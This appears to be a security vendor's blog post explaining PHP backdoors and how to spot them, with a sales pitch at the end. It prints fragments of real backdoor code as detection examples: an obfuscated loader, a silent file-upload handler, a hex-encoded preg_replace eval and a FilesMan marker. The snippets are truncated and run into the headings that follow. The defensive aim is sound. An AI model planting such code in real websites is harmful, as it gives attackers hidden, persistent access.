More than 1 lakh website is being hacked daily. It is believed that once a website is compromised, there is a 40% chance of it getting hacked again. Hackers often leave a malicious code (PHP Backdoors) that allows them to re-access the website. This malware is very difficult to remove, so even if you reset your entire admin panel, these codes are still found hidden deep into the website. These codes are called “backdoor” since it allows a bypasses access into the website. Today, many popular CMS such as WordPress, Magneto, etc are run on PHP; a server-side scripting language. Because of the usage of PHP in more than 80% of the websites on the web today. The PHP backdoors have become a major hacking threat.
What are PHP Backdoors?
The PHP backdoors are malware scripts or programs designed to infect your website secretly and provide an authentication bypass to hackers. Backdoors can be used to retain access to the website, inject malware, scrape data, insert a card-skimmer, steal financial data, and so on.
The PHP web shell can also allow attackers to manage and run the administration of your PHP server remotely. The attackers can access the admin panel using a URL on the internet. More complex backdoors can also directly access the core memory and exploit the data of your website.
The PHP backdoors are designed for maintaining persistence. They are designed to appear again and again even after a thorough clean-up of your website. And thus it’s very hard to get rid of backdoors.
Detecting PHP Backdoors on your website:
The power of a PHP Backdoor is extremely vast. From allowing hackers to run small commands on your website to allow attackers to exploiting and redirecting the website traffic. These backdoors are designed to escalate privileges and beyond. Using a PHP backdoor, the hacker can invade the following:
- Access any type of data on your server.
- May use your server to mine cryptocurrency.
- Can turn your server into a bot that obeys instructions from the attacker to chunk out large amounts of spam.
And many more evils!
Detecting PHP Backdoor on your website:
Not every website owner possesses acute technical knowledge. As a site owner, there is a high chance of you not being aware of the existence of backdoors or any other unauthenticated code present on your website until obviously it starts showing signs.
Therefore, website owners reach out to companies like Astra who help in tracking down these backdoors and getting rid of them. These malicious codes are difficult to find as they are often obfuscated code, which makes it even more complex to discern.
Moreover, not all backdoors targeting a website look alike. Hence, one can not rest if he finds one of the backdoors, it just means that you need to dig deeper. There are many ways a PHP backdoor can hide on your website. However, a few common security issues which allow this infection are as follows:
- Weak or default Passwords.
- Unrestricted PHP file upload.
- Poor coding of the PHP site which allows invalidated input.
- The outdated PHP version.
- Improper PHP configurations.
- Weak file permissions of sensitive files.
- Improper error reporting and disclosure of code.
Removing PHP Backdoors from your website
The first step towards removing these backdoors is to detect the position of this malware. Removal of the backdoor also requires finding the initial code that allowed for the unauthorized access and thus, removing that code. Hence, the understanding of the code that operates your site is very important. Below there is a list of files and codes that can be responsible for PHP Backdoors.
Rogue File Backdoors
There are many cases where backdoors were found as rogue files. However, these files are not part of the core plugin, theme, or content management system. But, they have names that seem similar to other core files. Thus, they can be replaced easily. Code in a rogue file might start like these:
$t43="l/T6\\:aAcNLn#?rP}1\rG_ -s`SZ\$58t\n7E{.*]ixy3h,COKR2dW[0!U\tuQIHf4bYm>wFz<=DqV@&(BjX'~|ge%p+oMJv^);\"k9";$GLOBALS['ofmhl60'] = ${$t43[20].$t43Backdoor Plugins and Themes
Multiple plugins and themes are one of the most used features irrespective of the CMS you are working with. Malicious plugin files are only visible in the file system through your file manager or FTP. Hackers introduce PHP backdoors in many commonly used plugins.They often go by the following names:
- WordPress Support
- Login Wall
- WP Zipp
- WP-Base-SEO
Thus, it is clear that the plugins which may seem normal at the time of installation are indeed the files with backdoor codes.The owner unaware of this fact, therefore, installs these files containing backdoors. One such example is of WordPress Sketch theme was for a time a popular malware-laden theme uploaded with numerous backdoor files within it. The only safe way to avoid such installation is for you to uninstall all the themes or plugins that you do not recognize.
Core File Backdoor Insertion
Core files of your website host can have PHP backdoors inserted into them as well. The malware can be found at the beginning of the file or at the end. But if the hacker really wants to destroy the core of your data, he will try and install it in between the codes.
Below are some of the examples of such codes:
Codes found at the beginning:
Here is another example.
@ini_set('display_errors','off');@ini_set('log_errors',0);@ini_set('error_log',NULL); error_reporting(0); @ini_set('set_time_limit',0);ignore_user_abort(true);if(@isset($_POST['size']) and @isset($_FILES['img']['name'])) {@ini_set('upload_max_filesize','1000000');$size=$_POST['size'];$open_image=$_FILES['img']['name']; $open_image_tmp=$_FILES['img']['tmp_name'];$image_tmp=$size.$open_image; @move_uploaded_file($open_image_tmp,$image_tmp);Other backdoors are highly obfuscated and may start like this.
preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\Often there will be references to FilesMan somewhere within the backdoor file.
$default_action = "FilesMan";Let’s fight cyber-crime together
Astra’s machine-learning powered automated malware scanner detects a large number of PHP backdoors and malware with just a click. The Astra firewall, on the other hand, monitors your website 24*7 for malicious traffic and blocks all coming security threats. Choose a plan according to your needs and get secured today!
Jinson Varghese
